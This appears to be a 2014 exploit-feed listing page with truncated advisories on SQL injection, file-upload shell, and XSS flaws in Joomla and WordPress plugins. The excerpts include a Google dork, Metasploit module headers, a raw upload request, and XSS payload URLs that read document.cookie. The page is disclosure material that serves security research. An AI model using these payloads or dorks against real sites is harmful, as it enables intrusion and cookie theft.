Joomla Youtube Gallery 4.1.7 SQL Injection

18 July 2014 - Source: http://www.mondounix.com
# Exploit Title: Joomla component com_youtubegallery - SQL Injection vulnerability
# Google Dork: inurl:index.php?option=com_youtubegallery
# Date: 15-07-2014
# Exploit Author: Pham Van Khanh (phamvankhanhbka@gmail.com)
# Vendor Homepage: http://www.joomlaboat.com/youtube-gallery
# Software Link: http://www.joomlaboat.com/youtube-gallery
# Version: 4.x ( 3.x maybe)
# Tested on: newest version 4.1.7 on Joomla 1.5, 2.5, 3
# CVE : CVE-2014-4960
 
Detail:
At line 40 of components\com_youtubegallery\models\gallery.php,
if the parameter listid is an int (or can be cast to an int), $listid and $themeid
are not sanitized.
Source code:
40: if(JRequest::getInt('listid'))
41: {
42:        //Shadow Box
43:        $listid=JRequest::getVar('listid');
44:
45:
46:...

WordPress WPTouch Authenticated File Upload

16 July 2014 - Source: http://www.mondounix.com
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
 
require 'msf/core'
 
class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking
 
  include Msf::HTTP::Wordpress
  include Msf::Exploit::FileDropper
 
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Wordpress WPTouch Authenticated File Upload',
      'Description'    => %q{
          The Wordpress WPTouch plugin contains an authenticated file upload
          vulnerability. A wp-nonce (CSRF token) is created on the backend index
          page and the same token is used on handling ajax file uploads through
          the...

WordPress DZS Video Gallery XSS / Path Disclosure / Command Execution

15 July 2014 - Source: http://www.mondounix.com
These are Cross-Site Scripting, Full Path Disclosure and OS Commanding
vulnerabilities in the DZS Video Gallery plugin for WordPress.
 
Earlier I disclosed Content Spoofing and Cross-Site Scripting
vulnerabilities in this plugin (http://securityvulns.ru/docs30871.html).
 
-------------------------
Affected products:
-------------------------
 
Vulnerable are all versions of DZS Video Gallery for WordPress.
 
-------------------------
Affected vendors:
-------------------------
 
Digital Zoom Studio
http://digitalzoomstudio.net
 
----------
Details:
----------
 
Cross-Site Scripting (WASC-08):
 
http://site/wp-content/plugins/dzs-videogallery/deploy/designer/preview.php?swfloc=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
 
http://site/wp-content/plugins/dzs-videogallery/deploy/designer/preview.php?designrand=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
 
Full...

WordPress Tidio Gallery 1.1 Shell Upload / XSS

15 July 2014 - Source: http://www.mondounix.com
######################
# Exploit Title : Wordpress Tidio Gallery 1.1 Shell Upload and XSS Vulnerabilities
 
# Exploit Author : Claudio Viviani
 
# Vendor Homepage : http://www.tidioelements.com/
 
# Software Link : http://downloads.wordpress.org/plugin/tidio-gallery.zip
 
# Date : 2014-07-14
 
# Tested on : Windows 7 / Mozilla Firefox
 
######################
 
# Location :  
 
http://VICTIM/wp-content/plugins/tidio-gallery/popup-insert-help.php -> XSS
 
http://VICTIM/wp-content/plugins/tidio-gallery/popup-insert-post.php -> Upload Shell
 
 
######################
 
# Vulnerability n°1:
 
XSS Reflected Unauthenticated
 
http://VICTIM/wp-content/plugins/tidio-gallery/popup-insert-help.php?galleryId="/><script>alert(1);</script>
 
#...

WordPress CopySafe PDF Protection 0.6 Shell Upload

15 July 2014 - Source: http://www.mondounix.com
##################################################################################################
#Exploit Title : Wordpress Plugin CopySafe PDF Protection Shell Upload vulnerability
#Author        : Jagriti Sahu
#Download Link : http://wordpress.org/support/plugin/wp-copysafe-pdf
#version affected :  0.6 and below
#Date          : 14/07/2014
#Discovered at : IndiShell Lab
#Love to       : Surbhi, Mradula and Harry
##################################################################################################
 
////////////////////////
/// Overview:
////////////////////////
  Wordpress Plugin CopySafe PDF Protection (up to version 0.6) suffers
from an unrestricted file upload vulnerability which allows an attacker to
upload...

WordPress Compfight 1.4 Cross Site Scripting

12 July 2014 - Source: http://www.mondounix.com
######################
# Exploit Title : Wordpress Compfight 1.4 Authenticated Cross Site Scripting
 
# Exploit Author : Claudio Viviani
 
# Vendor Homepage : http://wordpress.org/plugins/easy-banners/
 
# Software Link : http://downloads.wordpress.org/plugin/compfight.1.4.zip
 
# Date : 2014-07-03
 
# Tested on : Windows 7 / Mozilla Firefox
 
######################
 
# Location :  
http://localhost/wp-content/plugins/compfight/compfight-search.php
 
######################
 
# Vulnerable code :
 
  if (!$search_value) {
      $input_text = 'Enter Keyword(s)';
    } else {
      $input_text = $search_value;
    }
 
    if ($show_title) {
      $output .= '<h3 class="cf_search_title">Compfight</h3>';
...

WordPress Download Manager 2.6.8 Shell Upload

12 July 2014 - Source: http://www.mondounix.com
######################
# Exploit Title : WordPress Download Manager 2.6.8 Shell Upload Vulnerability
 
# Exploit Author : Claudio Viviani
 
# Vendor Homepage : www.wpdownloadmanager.com
 
# Software Link : http://downloads.wordpress.org/plugin/download-manager.zip
 
# Date : 2014-07-11
 
# Tested on : Linux / Mozilla Firefox / WordPress Download Manager 2.6.8 Free Version
#        
#             
 
######################
 
# Location : 
 
http://IP_VICTIM/wp-content/plugins/download-manager/wpdm-add-new-file.php
 
 
######################
 
# Description :
 
WordPress Download Manager 2.6.8 suffers from a remote shell upload vulnerability.
 
Author or Administrator...

WordPress BSK PDF Manager 1.3.2 SQL Injection

9 July 2014 - Source: http://www.mondounix.com
######################
# Exploit Title : Wordpress BSK PDF Manager 1.3.2 Authenticated SQL Injection
 
# Exploit Author : Claudio Viviani
 
# Vendor Homepage : http://www.bannersky.com/bsk-pdf-manager/
 
# Software Link : http://downloads.wordpress.org/plugin/bsk-pdf-manager.zip
 
# Date : 2014-07-04
 
# Tested on : Windows 7 / Mozilla Firefox
#        Linux / Mozilla Firefox
#             Linux / sqlmap 1.0-dev-5b2ded0
 
######################
 
# Location :  
http://localhost/wp-content/plugins/compfight/compfight-search.php
 
######################
 
# Vulnerable code :
 
[claudio@localhost ~]$ grep -R GET bsk-pdf-manager/
bsk-pdf-manager/inc/bsk-pdf-dashboard.php:         ...

WordPress NextGEN Gallery 2.0.63 Shell Upload

7 July 2014 - Source: http://www.mondounix.com
# Exploit Title: Wordpress NextGEN Gallery Plugin 2.0.63 Arbitrary File Upload
# Author: SANTHO ( @s4n7h0 )
# Vendor Homepage: http://wordpress.org/plugins/nextgen-gallery/
# Category: WebApp / CMS / Wordpress
# Version: 2.0.63 and less
---------------------------------------------------
 
 
Vulnerability Tracking
======================
Reported to vendor : Fri, May 9, 2014 at 9:20 PM
Vendor Acknowledgement : Sat, May 10, 2014 at 2:36 AM
Vendor Informed about patch release (version 2.65) : Mon, May 19, 2014 at 7:54 PM
 
 
 
Vulnerability Details
=======================
POST /index.php/photocrati_ajax?action=upload_image&gallery_id=0&gallery_name= HTTP/1.1
Host: target_ip
User-Agent: Mozilla/5.0...

WordPress MailPoet (wysija-newsletters) Unauthenticated File Upload

7 July 2014 - Source: http://www.mondounix.com
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
 
require 'msf/core'
 
class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking
 
  include Msf::HTTP::Wordpress
  include Msf::Exploit::FileDropper
 
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Wordpress MailPoet (wysija-newsletters) Unauthenticated File Upload',
      'Description'    => %q{
          The Wordpress plugin "MailPoet Newsletters" (wysija-newsletters) before 2.6.8
          is vulnerable to an unauthenticated file upload. The exploit uses the Upload Theme
          functionality to upload a...
